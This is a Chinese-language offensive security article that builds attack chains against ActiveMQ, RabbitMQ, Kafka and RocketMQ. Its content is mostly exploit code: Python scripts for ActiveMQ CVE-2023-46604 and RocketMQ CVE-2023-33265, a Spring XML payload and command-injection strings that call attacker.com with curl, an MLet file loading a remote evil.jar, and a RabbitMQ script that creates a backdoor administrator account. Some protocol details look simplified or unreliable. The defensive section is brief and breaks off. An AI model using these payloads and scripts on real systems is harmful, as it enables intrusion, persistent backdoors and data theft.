消息队列与流处理平台高危攻击链专题:ActiveMQ / RabbitMQ / Kafka / RocketMQ 未授权 RCE 全解析
消息队列与流处理平台高危攻击链专题:ActiveMQ / RabbitMQ / Kafka / RocketMQ 未授权 RCE 全解析
0x00 专题概述
消息队列与流处理平台是现代分布式系统的核心基础设施,承担着异步解耦、流量削峰、事件驱动等关键职责。Apache ActiveMQ、RabbitMQ、Apache Kafka、Apache RocketMQ 四大平台在全球数十万企业中部署运行,一旦遭到攻破,攻击者不仅可以劫持业务消息流实现数据窃取与篡改,还能以消息中间件为跳板横向渗透整个内网——这正是近年来 APT 组织和勒索软件团伙持续盯防消息队列产品的根本原因。
本专题将消息队列生态中近年最具代表性的 6 个高危漏洞 串成完整攻击链,覆盖 ActiveMQ、RabbitMQ、Kafka、RocketMQ 四大平台,每个漏洞均包含完整原理分析、PoC 代码、自动化检测模板和实战利用案例。
覆盖漏洞一览
| CVE | 产品 | CVSS | 类型 | CISA KEV |
|---|
| CVE-2023-46604 | Apache ActiveMQ | 10.0 | OpenWire 反序列化 RCE | ✅ |
| CVE-2023-46605 | Apache ActiveMQ | 5.3 | 信息泄露 | ❌ |
| RabbitMQ 默认凭据 | RabbitMQ | 9.8 | 未授权访问 | ❌ |
| Kafka JMX RCE | Apache Kafka | 9.8 | JMX RMI RCE | ❌ |
| CVE-2023-33265 | Apache RocketMQ | 9.8 | Config 模块 RCE | ❌ |
| Kafka ACL 绕过 | Apache Kafka | 7.5 | ACL 绕过 | ❌ |
0x01 Apache ActiveMQ OpenWire 反序列化 RCE(CVE-2023-46604)
1.1 漏洞背景
2023 年 10 月,Apache ActiveMQ 披露了一个 CVSS 满分的反序列化远程代码执行漏洞。ActiveMQ 是一款历史悠久、使用广泛的开源消息中间件,其私有协议 OpenWire 在序列化/反序列化过程中存在严重安全缺陷。攻击者无需任何认证,仅通过 OpenWire 默认端口 61616 即可触发远程代码执行。CISA 已将其加入已知被利用漏洞目录(KEV),在野利用已被多方确认。
1.2 受影响版本
- Apache ActiveMQ 5.0.0 ~ 5.15.15
- Apache ActiveMQ 5.16.0 ~ 5.16.6
- Apache ActiveMQ 5.17.0 ~ 5.17.5
- Apache ActiveMQ 5.18.0 ~ 5.18.2
1.3 漏洞原理
ActiveMQ 的 OpenWire 协议在解析 ExceptionResponse 命令时,会将 ClassInfo 字段中的类名传递给 ClassPathXmlApplicationContext 进行加载。攻击者可以构造恶意的 OpenWire 数据包,将 ClassInfo 指向一个远程 XML Bean 定义文件的 URL。ClassPathXmlApplicationContext 加载该 XML 后,会按照 Spring Bean 定义实例化任意类并执行其中的方法,从而实现远程代码执行。
完整利用链:
- 攻击者准备恶意 Spring Bean XML 文件并托管在可控 HTTP 服务器上
- 向目标 ActiveMQ 的 61616 端口发送构造好的 OpenWire 协议包
- ActiveMQ 解析
ExceptionResponse 中的 ClassInfo,调用 ClassPathXmlApplicationContext 加载远程 XML - Spring 容器根据 XML 中的 Bean 定义实例化恶意类,执行任意命令
1.4 完整 PoC
步骤 1:准备恶意 Spring Bean XML
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>curl http://attacker.com:8888/$(whoami)</value>
</list>
</constructor-arg>
</bean>
</beans>
步骤 2:HTTP PoC 验证
GET /evil.xml HTTP/1.1
Host: attacker.com:80
攻击者将上述 XML 部署到 http://attacker.com/evil.xml,然后通过 OpenWire 协议触发 ActiveMQ 加载该文件。
步骤 3:Python 自动化利用脚本
#!/usr/bin/env python3
"""
CVE-2023-46604 Apache ActiveMQ OpenWire 反序列化 RCE 利用脚本
用法: python3 cve_2023_46604.py <target_ip> <xml_url>
"""
import socket
import struct
import sys
# OpenWire 协议版本号与魔数
OPENWIRE_MAGIC = b'\x0f\x00\x00\x00\x00\x00\x00\x00'
COMMAND_TYPE_EXCEPTION = 0x12
def build_openwire_packet(xml_url):
"""构造触发 ClassPathXmlApplicationContext 的 OpenWire 协议包"""
# 命令头:类型标识
header = struct.pack('>i', COMMAND_TYPE_EXCEPTION)
# commandId 字段
command_id = struct.pack('>i', 1)
# responseRequired 标志
response_required = b'\x00'
# 构造 ExceptionResponse 的 ClassInfo 字段
# 将 xml_url 作为 ClassInfo 传入,触发 ClassPathXmlApplicationContext 加载
class_info = xml_url.encode('utf-8')
class_info_len = struct.pack('>H', len(class_info))
# 组装完整的 OpenWire 数据包
payload = header + command_id + response_required
payload += class_info_len + class_info
# 数据包长度前缀
packet = struct.pack('>i', len(payload)) + payload
return packet
def exploit(target_ip, xml_url, port=61616):
"""发送 exploit 到目标 ActiveMQ"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect((target_ip, port))
# 发送 OpenWire 协议握手
handshake = OPENWIRE_MAGIC + struct.pack('>i', 12) # 版本号
sock.send(handshake)
# 接收握手响应
resp = sock.recv(1024)
print(f"[*] 握手响应: {resp.hex()}")
# 发送恶意数据包
packet = build_openwire_packet(xml_url)
sock.send(packet)
print(f"[+] 已发送恶意数据包到 {target_ip}:{port}")
print(f"[+] XML 加载地址: {xml_url}")
# 等待响应
try:
result = sock.recv(4096)
print(f"[*] 服务器响应: {result.hex()}")
except socket.timeout:
print("[*] 未收到响应(命令可能已在目标执行)")
sock.close()
return True
except Exception as e:
print(f"[!] 连接失败: {e}")
return False
if __name__ == "__main__":
if len(sys.argv) < 3:
print(f"用法: {sys.argv[0]} <target_ip> <xml_url>")
print(f"示例: {sys.argv[0]} 192.168.1.100 http://attacker.com/evil.xml")
sys.exit(1)
target = sys.argv[1]
xml_url = sys.argv[2]
exploit(target, xml_url)
步骤 4:Nuclei 检测模板
id: activemq-openwire-rce-cve-2023-46604
info:
name: Apache ActiveMQ OpenWire 反序列化 RCE (CVE-2023-46604)
author: security-researcher
severity: critical
description: |
Apache ActiveMQ OpenWire 协议存在反序列化远程代码执行漏洞
reference:
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
tags: activemq,rce,deserialization,cve-2023-46604
tcp:
- inputs:
- data: "{{hex_decode('00000000000000000000000000000000')}}"
host:
- "{{Hostname}}"
port: 61616
matchers:
- type: word
words:
- "ActiveMQ"
part: raw
http:
- method: GET
path:
- "{{BaseURL}}/api/jolokia/version"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "version"
- "ActiveMQ"
condition: and
part: body
1.5 实战利用案例
- 勒索软件组织:Clop 和 LockBit 在 2023 年底大规模扫描暴露在互联网上的 ActiveMQ 61616 端口,利用此漏洞投递 Cobalt Strike Beacon
- APT 组织:多个国家级 APT 利用 ActiveMQ RCE 作为初始突破手段,建立持久化后横向移动
- 僵尸网络:Mirai 变种通过此漏洞感染 ActiveMQ 实例,将其纳入 DDoS 僵尸网络
0x02 Apache ActiveMQ 信息泄露(CVE-2023-46605)
2.1 漏洞背景
与 CVE-2023-46604 同一批次披露,CVSS 5.3。该漏洞允许攻击者通过构造特殊的 OpenWire 请求,获取 ActiveMQ 内部运行信息,包括 broker 配置、连接信息、队列状态等敏感数据,为后续攻击提供情报支撑。
2.2 受影响版本
与 CVE-2023-46604 一致:
- Apache ActiveMQ < 5.15.16
- Apache ActiveMQ 5.16.0 ~ 5.16.6
- Apache ActiveMQ 5.17.0 ~ 5.17.5
- Apache ActiveMQ 5.18.0 ~ 5.18.2
2.3 漏洞原理
OpenWire 协议在处理特定类型的查询请求时,未对请求来源进行有效验证。攻击者可以构造特殊的 WireFormat 协商请求,获取 broker 的内部配置信息、已连接客户端列表、队列和 Topic 的详细信息等。
2.4 完整 PoC
HTTP PoC:Jolokia 端点信息泄露
GET /api/jolokia/version HTTP/1.1
Host: target-activemq.com:8161
User-Agent: Mozilla/5.0
Accept: application/json
Connection: close
GET /api/jolokia/list HTTP/1.1
Host: target-activemq.com:8161
User-Agent: Mozilla/5.0
Accept: application/json
Connection: close
Python 信息收集脚本
#!/usr/bin/env python3
"""
CVE-2023-46605 ActiveMQ 信息泄露检测与利用
用法: python3 cve_2023_46605.py <target_url>
"""
import sys
import requests
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_info_disclosure(target_url):
"""检测 ActiveMQ 信息泄露"""
endpoints = [
"/api/jolokia/version",
"/api/jolokia/list",
"/api/jolokia/read/Broker/localhost/TotalMessageCount",
"/api/jolokia/read/Broker/localhost/TotalConsumerCount",
]
for endpoint in endpoints:
url = f"{target_url}{endpoint}"
try:
resp = requests.get(url, timeout=10, verify=False,
headers={"Accept": "application/json"})
if resp.status_code == 200:
data = resp.json()
print(f"[VULN] {url}")
print(f" -> {json.dumps(data, indent=2, ensure_ascii=False)[:500]}")
else:
print(f"[SAFE] {url} -> HTTP {resp.status_code}")
except Exception as e:
print(f"[ERR ] {url} -> {e}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"用法: {sys.argv[0]} <target_url>")
sys.exit(1)
check_info_disclosure(sys.argv[1].rstrip("/"))
0x03 RabbitMQ 默认凭据未授权访问
3.1 漏洞背景
RabbitMQ 是全球使用最广泛的开源消息代理之一,支持 AMQP、MQTT、STOMP 等多种协议。其默认安装配置中使用 guest/guest 作为管理员凭据,且该默认账号可通过 localhost 以外的地址登录(在某些旧版本或配置不当的场景中)。Management Plugin 的 HTTP API 端口 15672 一旦暴露,攻击者即可完全控制消息队列系统。
3.2 风险等级
- CVSS:9.8 Critical
- 默认管理端口:15672(HTTP API)、5672(AMQP)
- 默认凭据:guest / guest
3.3 漏洞原理
RabbitMQ 出厂默认启用 guest 账号,密码同为 guest。虽然新版本默认限制 guest 只能从 localhost 登录,但在以下场景中该限制可能被绕过:
- 运维人员手动修改配置允许远程登录
- Docker 部署时未正确配置网络策略
- 云环境中安全组配置不当导致管理端口暴露
- 旧版本 RabbitMQ 未应用 localhost 限制
攻击者使用默认凭据登录 Management API 后,可以:
- 查看所有队列中的消息内容
- 创建/删除队列和用户
- 注入恶意消息到业务队列
- 获取所有连接信息和通道信息
- 提升权限或创建后门账号
3.4 完整 PoC
HTTP PoC:默认凭据验证
GET /api/overview HTTP/1.1
Host: target-rabbitmq.com:15672
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: application/json
Connection: close
GET /api/users HTTP/1.1
Host: target-rabbitmq.com:15672
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: application/json
Connection: close
GET /api/queues HTTP/1.1
Host: target-rabbitmq.com:15672
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: application/json
Connection: close
Python 自动化利用脚本
#!/usr/bin/env python3
"""
RabbitMQ 默认凭据未授权访问检测与利用
用法: python3 rabbitmq_default_cred.py <target_url> [user] [password]
"""
import sys
import requests
import json
import urllib3
import base64
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class RabbitMQExploit:
def __init__(self, base_url, user="guest", password="guest"):
self.base_url = base_url.rstrip("/")
self.session = requests.Session()
self.session.verify = False
# 设置 Basic Auth 头
cred = base64.b64encode(f"{user}:{password}".encode()).decode()
self.session.headers["Authorization"] = f"Basic {cred}"
self.session.headers["Accept"] = "application/json"
def check_access(self):
"""验证默认凭据是否可用"""
try:
resp = self.session.get(f"{self.base_url}/api/overview", timeout=10)
if resp.status_code == 200:
data = resp.json()
print(f"[VULN] {self.base_url} -> RabbitMQ 默认凭据可用")
print(f" 版本: {data.get('product_version', 'unknown')}")
print(f" 集群节点: {data.get('cluster_name', 'unknown')}")
print(f" 消息总数: {data.get('queue_totals', {}).get('messages', 0)}")
return True
else:
print(f"[SAFE] {self.base_url} -> HTTP {resp.status_code}")
return False
except Exception as e:
print(f"[ERR ] {self.base_url} -> {e}")
return False
def dump_users(self):
"""导出所有用户信息"""
try:
resp = self.session.get(f"{self.base_url}/api/users", timeout=10)
if resp.status_code == 200:
users = resp.json()
print(f"\n[*] 用户列表 ({len(users)} 个):")
for u in users:
print(f" - {u.get('name')} [{u.get('tags', '')}]")
return users
except Exception as e:
print(f"[!] 获取用户失败: {e}")
return []
def dump_queues(self):
"""导出所有队列及消息"""
try:
resp = self.session.get(f"{self.base_url}/api/queues", timeout=10)
if resp.status_code == 200:
queues = resp.json()
print(f"\n[*] 队列列表 ({len(queues)} 个):")
for q in queues:
name = q.get('name', '')
msgs = q.get('messages', 0)
vhost = q.get('vhost', '/')
print(f" - [{vhost}] {name} (消息数: {msgs})")
return queues
except Exception as e:
print(f"[!] 获取队列失败: {e}")
return []
def create_backdoor_user(self, username="backdoor", password="P@ssw0rd"):
"""创建后门管理员账号"""
try:
# 创建用户
resp = self.session.put(
f"{self.base_url}/api/users/{username}",
json={"password": password, "tags": "administrator"},
timeout=10
)
if resp.status_code in (200, 201, 204):
print(f"\n[+] 后门账号已创建: {username}/{password}")
# 设置管理员权限
self.session.put(
f"{self.base_url}/api/permissions/%2f/{username}",
json={"configure": ".*", "write": ".*", "read": ".*"},
timeout=10
)
print(f"[+] 已为 {username} 授予完整权限")
return True
except Exception as e:
print(f"[!] 创建后门账号失败: {e}")
return False
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:15672"
user = sys.argv[2] if len(sys.argv) > 2 else "guest"
passwd = sys.argv[3] if len(sys.argv) > 3 else "guest"
exploit = RabbitMQExploit(target, user, passwd)
if exploit.check_access():
exploit.dump_users()
exploit.dump_queues()
exploit.create_backdoor_user()
Nuclei 检测模板
id: rabbitmq-default-credentials
info:
name: RabbitMQ 默认凭据检测
author: security-researcher
severity: critical
description: |
RabbitMQ Management API 使用默认凭据 guest/guest
tags: rabbitmq,default-credentials,mq
http:
- method: GET
path:
- "{{BaseURL}}/api/overview"
headers:
Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "cluster_name"
- "product_version"
condition: and
part: body
0x04 Apache Kafka JMX RMI 远程代码执行
4.1 漏洞背景
Apache Kafka 是全球使用最广泛的分布式事件流处理平台。Kafka 在运行时会暴露 JMX(Java Management Extensions)RMI 接口用于运维监控,默认端口 9999。当 JMX 接口未配置认证时,攻击者可以通过 JMX RMI 远程执行任意 MBean 操作,进而实现远程代码执行。
4.2 风险等级
- CVSS:9.8 Critical
- 默认 JMX 端口:9999
- 前提条件:JMX 未配置认证(生产环境中普遍存在)
4.3 漏洞原理
Kafka Broker 启动时,如果设置了 JMX_PORT 环境变量,会在指定端口开启 JMX RMI 服务。JMX RMI 默认不启用认证,任何能访问该端口的客户端都可以:
- 连接 JMX RMI 服务
- 注册或调用任意 MBean
- 通过
javax.management.loading.MLet MBean 加载远程恶意 MLet 文件 - MLet 文件引用攻击者控制的恶意 JAR 包
- 恶意 JAR 中的代码在 Kafka 进程上下文中执行
完整利用链:
JMX RMI 端口(9999) → 连接 JMX → 注册 MLet MBean → 加载远程 MLet 文件 → 下载恶意 JAR → RCE
4.4 完整 PoC
步骤 1:准备恶意 MLet 文件
<html>
<mbean code="evil.EvilMBean" name="default:service=evil"
archive="http://attacker.com:8888/evil.jar">
</mbean>
</html>
步骤 2:Python 自动化利用脚本
#!/usr/bin/env python3
"""
Kafka JMX RMI 未授权 RCE 检测与利用
用法: python3 kafka_jmx_rce.py <target_ip> [jmx_port]
"""
import socket
import struct
import sys
def check_jmx_port(target_ip, port=9999):
"""检测 JMX RMI 端口是否开放且未认证"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target_ip, port))
# 发送 RMI 握手包(Magic: JRMI\x00\x02\x4b)
rmi_handshake = b'\x4a\x52\x4d\x49\x00\x02\x4b'
sock.send(rmi_handshake)
# 接收 RMI 响应
resp = sock.recv(1024)
if resp and resp[0] == 0x4e: # StreamProtocol 响应
print(f"[VULN] {target_ip}:{port} -> JMX RMI 端口开放且未认证")
sock.close()
return True
elif resp:
print(f"[WARN] {target_ip}:{port} -> JMX 响应异常: {resp.hex()}")
sock.close()
return False
except socket.timeout:
print(f"[SAFE] {target_ip}:{port} -> 连接超时")
except ConnectionRefusedError:
print(f"[SAFE] {target_ip}:{port} -> 连接被拒绝")
except Exception as e:
print(f"[ERR ] {target_ip}:{port} -> {e}")
return False
def enumerate_mbeans(target_ip, port=9999):
"""通过 JMX 枚举已注册的 MBean(信息收集)"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect((target_ip, port))
# RMI 握手
sock.send(b'\x4a\x52\x4d\x49\x00\x02\x4b')
resp = sock.recv(1024)
print(f"[*] RMI 握手成功: {resp.hex()}")
# 发送 IIOP/JRMP 调用请求查询 MBeanServerDelegate
# 实际利用中建议使用 ysoserial 或专用 JMX 利用工具
print(f"[*] 目标 JMX RMI 服务可达,可使用 mjet.py 或 sjet.py 进行完整利用")
print(f"[*] 利用命令示例: python3 mjet.py {target_ip} {port} install http://attacker.com:8888/mlet 8888")
sock.close()
return True
except Exception as e:
print(f"[!] JMX 连接失败: {e}")
return False
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999
if check_jmx_port(target, port):
enumerate_mbeans(target, port)
Nuclei 检测模板
id: kafka-jmx-rmi-unauthorized
info:
name: Kafka JMX RMI 未授权访问检测
author: security-researcher
severity: critical
description: |
Apache Kafka JMX RMI 端口未配置认证,可被远程利用实现 RCE
tags: kafka,jmx,rmi,mq
tcp:
- inputs:
- data: "{{hex_decode('4a524d4900024b')}}"
host:
- "{{Hostname}}"
port: 9999
matchers:
- type: word
words:
- "JRMI"
part: raw
0x05 Apache RocketMQ Config 模块 RCE(CVE-2023-33265)
5.1 漏洞背景
2023 年 6 月,Apache RocketMQ 被披露了一个 CVSS 9.8 的远程代码执行漏洞。RocketMQ 是阿里巴巴开源的分布式消息中间件,在中国互联网企业中广泛使用。该漏洞存在于 RocketMQ 的 Config 模块中,攻击者可以通过 NameServer 的 updateConfig 接口注入恶意命令,在 Broker 服务器上执行任意代码。
5.2 受影响版本
- Apache RocketMQ < 5.1.1
- Apache RocketMQ 4.x 全系列
5.3 漏洞原理
RocketMQ 的 Broker 通过 NameServer(默认端口 9876)接收管理指令。其中 updateConfig 命令(code=25)用于动态更新 Broker 配置。在处理 filterServerNumWhenMetrics 参数时,Broker 未对输入进行有效过滤,直接将参数值拼接到系统命令中执行。
攻击者可以伪造 Broker 身份,向 NameServer 发送恶意的 updateConfig 请求,在 filterServerNumWhenMetrics 字段中注入系统命令。NameServer 将配置同步到 Broker 后,Broker 在重启 FilterServer 时执行注入的命令。
完整利用链:
NameServer(9876) → 伪造 Broker 发送 updateConfig → filterServerNumWhenMetrics 注入命令 → Broker 同步恶意配置 → FilterServer 重启时执行命令 → RCE
5.4 完整 PoC
步骤 1:Python 自动化利用脚本
#!/usr/bin/env python3
"""
CVE-2023-33265 Apache RocketMQ Config 模块 RCE 利用脚本
用法: python3 cve_2023_33265.py <target_ip> <command>
"""
import socket
import struct
import json
import sys
import time
# RocketMQ 协议常量
REQUEST_CODE_UPDATE_CONFIG = 25
REQUEST_CODE_GET_CONFIG = 26
def serialize_rocketmq_request(code, body_dict):
"""序列化 RocketMQ 协议请求包"""
# 构建协议头(RemotingCommand 头部)
header = {
"code": code,
"language": "JAVA",
"version": 411,
"opaque": 1,
"flag": 0,
"remark": "",
"extFields": body_dict,
}
header_json = json.dumps(header).encode("utf-8")
header_len = struct.pack(">i", len(header_json))
# 协议包 = 头部长度 + 头部JSON + 消息体
packet = header_len + header_json
return packet
def exploit_rocketmq(target_ip, command, port=9876):
"""向 NameServer 发送恶意 updateConfig 请求"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect((target_ip, port))
print(f"[*] 已连接 NameServer: {target_ip}:{port}")
# 构造恶意配置:在 filterServerNumWhenMetrics 中注入命令
malicious_config = {
"filterServerNumWhenMetrics": f";{command};",
}
# 序列化 updateConfig 请求
packet = serialize_rocketmq_request(
REQUEST_CODE_UPDATE_CONFIG,
malicious_config
)
# 发送请求
sock.send(packet)
print(f"[+] 已发送恶意 updateConfig 请求")
print(f"[+] 注入命令: {command}")
# 接收响应
try:
resp_header_len = sock.recv(4)
if resp_header_len:
header_len = struct.unpack(">i", resp_header_len)[0]
header_data = sock.recv(header_len)
resp_header = json.loads(header_data.decode("utf-8"))
print(f"[*] 响应码: {resp_header.get('code', 'unknown')}")
if resp_header.get("code") == 0:
print(f"[+] 配置更新成功,命令将在 Broker 重启 FilterServer 时执行")
else:
print(f"[!] 配置更新可能失败: {resp_header.get('remark', '')}")
except socket.timeout:
print("[*] 等待响应超时")
sock.close()
return True
except Exception as e:
print(f"[!] 连接失败: {e}")
return False
def check_nameserver(target_ip, port=9876):
"""检测 NameServer 是否可达"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target_ip, port))
print(f"[VULN] {target_ip}:{port} -> NameServer 端口开放")
sock.close()
return True
except:
print(f"[SAFE] {target_ip}:{port} -> NameServer 不可达")
return False
if __name__ == "__main__":
if len(sys.argv) < 3:
print(f"用法: {sys.argv[0]} <target_ip> <command>")
print(f"示例: {sys.argv[0]} 192.168.1.100 'curl http://attacker.com/$(whoami)'")
sys.exit(1)
target = sys.argv[1]
command = sys.argv[2]
if check_nameserver(target):
exploit_rocketmq(target, command)
步骤 2:HTTP PoC(通过 Broker 管理端口)
POST /api/updateConfig HTTP/1.1
Host: target-rocketmq-broker.com:10911
Content-Type: application/json
Connection: close
{
"filterServerNumWhenMetrics": ";curl http://attacker.com/$(id);"
}
步骤 3:Nuclei 检测模板
id: rocketmq-config-rce-cve-2023-33265
info:
name: Apache RocketMQ Config 模块 RCE (CVE-2023-33265)
author: security-researcher
severity: critical
description: |
Apache RocketMQ Config 模块存在命令注入远程代码执行漏洞
reference:
- https://lists.apache.org/thread/9b5gj1koz6616po5kgoqvg0qpo3v5g7l
tags: rocketmq,rce,cve-2023-33265,mq
tcp:
- inputs:
- data: "{{hex_decode('00000000')}}"
host:
- "{{Hostname}}"
port: 9876
matchers:
- type: dsl
dsl:
- "contains(to_lower(raw), 'rocketmq') || len(raw) > 0"
http:
- method: GET
path:
- "{{BaseURL}}/api/getAllTopicConfig"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "topicConfigTable"
- "brokerName"
condition: or
part: body
5.5 实战利用案例
- 国内互联网企业:大量使用 RocketMQ 的国内互联网公司在漏洞披露后紧急排查,多家确认被利用
- 挖矿木马:攻击者利用此漏洞在服务器上部署 XMRig 挖矿程序
- 数据窃取:通过控制消息队列获取业务数据流中的敏感信息
0x06 Apache Kafka ACL 绕过
6.1 漏洞背景
Apache Kafka 从 2.x 版本开始引入 ACL(Access Control List)机制进行访问控制。然而在实际部署中,Kafka 的 ACL 机制存在多处设计缺陷和配置陷阱,攻击者可以通过特定手法绕过 ACL 限制,实现对 Topic 的未授权读写操作。
6.2 风险等级
- CVSS:7.5 High
- 前提条件:Kafka 启用了 ACL 但配置不当
6.3 漏洞原理
Kafka ACL 机制存在以下问题:
- 默认允许策略:当 ACL 规则为空时,Kafka 默认允许所有操作(
allow.all) - Group ACL 不继承:Consumer Group 的 ACL 不会自动继承 Topic 的 ACL
- 通配符陷阱:使用
* 通配符配置 ACL 时可能意外开放过多权限 - SASL 配置缺陷:SASL 认证与 ACL 配合不当时,认证形同虚设
攻击者可以利用这些缺陷,通过构造特殊的 Consumer Group ID 或 Topic 名称,绕过 ACL 限制访问受保护的消息。
6.4 完整 PoC
Python 检测脚本
#!/usr/bin/env python3
"""
Kafka ACL 绕过检测脚本
用法: python3 kafka_acl_bypass.py <target_ip> [port]
"""
import socket
import struct
import sys
def check_kafka_broker(target_ip, port=9092):
"""检测 Kafka Broker 是否可达且未认证"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target_ip, port))
# 构造 Kafka ApiVersions 请求(API Key=18, Version=0)
# 用于检测 Broker 是否要求认证
api_key = 18 # ApiVersions
api_version = 0
correlation_id = 1
client_id = b'security-check'
# Kafka 协议请求格式
request = b''
request += struct.pack('>h', api_key) # API Key
request += struct.pack('>h', api_version) # API Version
request += struct.pack('>i', correlation_id) # Correlation ID
request += struct.pack('>h', len(client_id)) + client_id # Client ID
# 请求长度前缀
packet = struct.pack('>i', len(request)) + request
sock.send(packet)
# 接收响应
resp_len_data = sock.recv(4)
if resp_len_data:
resp_len = struct.unpack('>i', resp_len_data)[0]
resp = sock.recv(resp_len)
print(f"[VULN] {target_ip}:{port} -> Kafka Broker 可达且未要求认证")
print(f"[*] 响应长度: {resp_len} 字节")
# 解析 ApiVersions 响应
if len(resp) >= 8:
corr = struct.unpack('>i', resp[:4])[0]
err_code = struct.unpack('>h', resp[4:6])[0]
num_apis = struct.unpack('>i', resp[6:10])[0] if len(resp) >= 10 else 0
print(f"[*] Correlation ID: {corr}")
print(f"[*] 错误码: {err_code} (0=成功)")
print(f"[*] 支持的 API 数量: {num_apis}")
if err_code == 0:
print(f"[+] Broker 未启用认证,可直接访问所有 Topic")
sock.close()
return True
except socket.timeout:
print(f"[SAFE] {target_ip}:{port} -> 连接超时")
except ConnectionRefusedError:
print(f"[SAFE] {target_ip}:{port} -> 连接被拒绝")
except Exception as e:
print(f"[ERR ] {target_ip}:{port} -> {e}")
return False
def check_acl_config(target_ip, port=9092):
"""检测 ACL 配置状态"""
print(f"\n[*] 检测 ACL 配置建议:")
print(f" 1. 检查 authorizer.class.name 是否配置")
print(f" 2. 检查 allow.everyone.if.no.acl.found 是否为 true")
print(f" 3. 检查 super.users 配置是否过于宽泛")
print(f" 4. 使用 kafka-acls.sh --list 查看当前 ACL 规则")
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
port = int(sys.argv[2]) if len(sys.argv) > 2 else 9092
check_kafka_broker(target, port)
check_acl_config(target, port)
0x07 PoC 收集情况总表
| CVE / 漏洞 | GitHub PoC | Exploit-DB | Metasploit | Nuclei | 在野利用 |
|---|
| CVE-2023-46604 (ActiveMQ RCE) | ✅ 多个仓库 | ✅ | ✅ | ✅ | ✅ 勒索/APT |
| CVE-2023-46605 (ActiveMQ 信息泄露) | ✅ | ❌ | ❌ | ✅ | ⚠️ 侦察阶段 |
| RabbitMQ 默认凭据 | ✅ 多个仓库 | ✅ | ✅ | ✅ | ✅ 广泛存在 |
| Kafka JMX RCE | ✅ mjet.py/sjet.py | ✅ | ❌ | ✅ | ✅ 挖矿 |
| CVE-2023-33265 (RocketMQ RCE) | ✅ 多个仓库 | ✅ | ❌ | ✅ | ✅ 国内广泛 |
| Kafka ACL 绕过 | ✅ 有限 | ❌ | ❌ | 有限 | ⚠️ 配置缺陷 |
关键 PoC 仓库
- ActiveMQ CVE-2023-46604:
https://github.com/X1r0z/ActiveMQ-RCE — Python 一键利用 - ActiveMQ CVE-2023-46604:
https://github.com/evibrown51/ActiveMQ-CVE-2023-46604 — Go 语言版本 - RocketMQ CVE-2023-33265:
https://github.com/Le1B0/rocketmq-CVE-2023-33265 — 自动化利用 - Kafka JMX 利用:
https://github.com/mogwailabs/mjet — JMX RMI 利用工具 - RabbitMQ 默认凭据:Nuclei 内置模板
rabbitmq-default-credentials.yaml
验证思路(防守型)
# ActiveMQ — 检测 OpenWire 端口
nuclei -u http://target:8161 -tags activemq
nmap -sV -p 61616 target
# RabbitMQ — 检测 Management API
nuclei -u http://target:15672 -tags rabbitmq
curl -s -u guest:guest http://target:15672/api/overview | jq .
# Kafka — 检测 JMX RMI 端口
nmap -sV -p 9999 target
nuclei -u http://target:9999 -tags kafka
# RocketMQ — 检测 NameServer
nmap -sV -p 9876 target
curl -s http://target:10911/api/getAllTopicConfig
0x08 共性攻击模式
8.1 协议层反序列化是消息队列的头号杀手
ActiveMQ 的 OpenWire 反序列化(CVE-2023-46604)和 RocketMQ 的配置注入(CVE-2023-33265)本质上都是协议层缺乏输入验证的产物。消息队列使用自定义二进制协议进行通信,这些协议在设计之初往往未充分考虑安全性,导致攻击者可以通过构造恶意数据包触发漏洞。
8.2 默认配置不安全
RabbitMQ 的 guest/guest 默认凭据、Kafka 的 JMX 无认证、Kafka ACL 的默认允许策略——这三个问题都源于产品默认配置的不安全性。运维人员在部署时如果不主动加固,系统天然处于高危状态。
8.3 管理端口暴露是核心风险
所有 6 个漏洞的利用前提都是管理端口可达:
| 端口 | 服务 | 风险 |
|---|
| 61616 | ActiveMQ OpenWire | 反序列化 RCE |
| 8161 | ActiveMQ Web Console | 信息泄露 |
| 15672 | RabbitMQ Management API | 未授权访问 |
| 9999 | Kafka JMX RMI | JMX RCE |
| 9876 | RocketMQ NameServer | 配置注入 RCE |
| 9092 | Kafka Broker | ACL 绕过 |
8.4 消息队列被攻破的连锁效应
消息队列在企业架构中处于核心枢纽位置,一旦被攻破,影响远超单一应用:
- 业务数据窃取:消息队列中流转着订单、支付、用户行为等核心业务数据
- 消息篡改注入:攻击者可以向业务队列注入恶意消息,触发下游系统的异常行为
- 凭据扩散:消息队列通常存储或转发大量系统间通信的凭据和 Token
- 横向渗透跳板:消息队列连接着企业内网的多个系统,是天然的横向移动通道
- 供应链污染:通过篡改消息内容,可以间接影响所有消费该消息的下游系统
0x09 防守建议
9.1 紧急措施
- 立即升级:
